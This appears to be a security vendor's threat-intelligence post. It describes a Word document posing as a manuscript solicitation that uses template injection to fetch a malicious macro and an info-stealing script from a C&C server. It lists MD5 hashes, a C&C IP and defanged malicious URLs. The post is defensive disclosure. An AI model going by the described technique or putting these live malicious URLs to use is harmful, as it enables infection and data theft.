Malware Disguised as a Manuscript Solicitation Letter (Targeting Security-Related Workers)

On January 8th, the ASEC analysis team identified the distribution of a document-type malware targeting workers in the security field. The obtained malware uses an external object within a Word document to execute an additional malicious macro. Such a technique is called the template Injection method. and a similar attack case was covered in a previous blog post.

Malicious Word Documents with External Link of North Korea Related Materials

When the Word document is opened, it downloads and executes an additional malicious Word macro document from the threat actor’s C&C server. The additionally executed macro is written so that a normal document file is opened simultaneously, in order to avoid users noticing that a macro code has been executed in the background.

The normal document file distributed with the malware by the threat actor has text written in Korean but includes Chinese fonts. From this, we can deduce that the threat actor is using a Chinese version of Word.

After executing the normal document, an info-leaking script is downloaded and executed, and this script is responsible for forwarding the information below to the C&C server.

• Infected PC system information
• List of recently opened Word files
• Directory information of the download folder in the system
• Modification of IE-related registries
• Registration to the task scheduler to maintain a connection to the C&C server
• Information on virus vaccines installed on the system

One thing to note is that in the threat actor’s C&C server IP (112.175.85.243), a similar phishing domain as the domain covered in the “Web Page Disguised as a Kakao Login Page” blog post (published on January 10th) was additionally found. This allows us to assume that the threat actor in the previous blog and this case is the same person.

Recently, there has been a surge of APT attacks using the template injection method. This method often involves distribution via email attachments, therefore, to prevent infection, users must refrain from opening attachments in emails from unknown senders.

Currently, AhnLab’s V3 detects relevant malware under the following aliases.

 

MD5

2244f8798062d4cef23255836a2b4569

2c9d6f178f652c44873edad3ae98fff5

3fe5ce0be3ce20b0c3c9a6cd0dae4ae9

68e79490ed1563904791ca54c97b680a

dd954121027d662158dcad24c21d04ba

URL

http[:]//lifehelper[.]kr/gnuboard4/bbs/img/upload/list[.]php?query=1

http[:]//lifehelper[.]kr/gnuboard4/bbs/img/upload/temp[.]docx

http[:]//lifehelper[.]kr/gnuboard4/bbs/img/upload/temp[.]dotm

http[:]//lifehelper[.]kr/gnuboard4/bbs/img/upload1/list[.]php?query=1

http[:]//lifehelper[.]kr/gnuboard4/bbs/img/upload1/temp[.]docx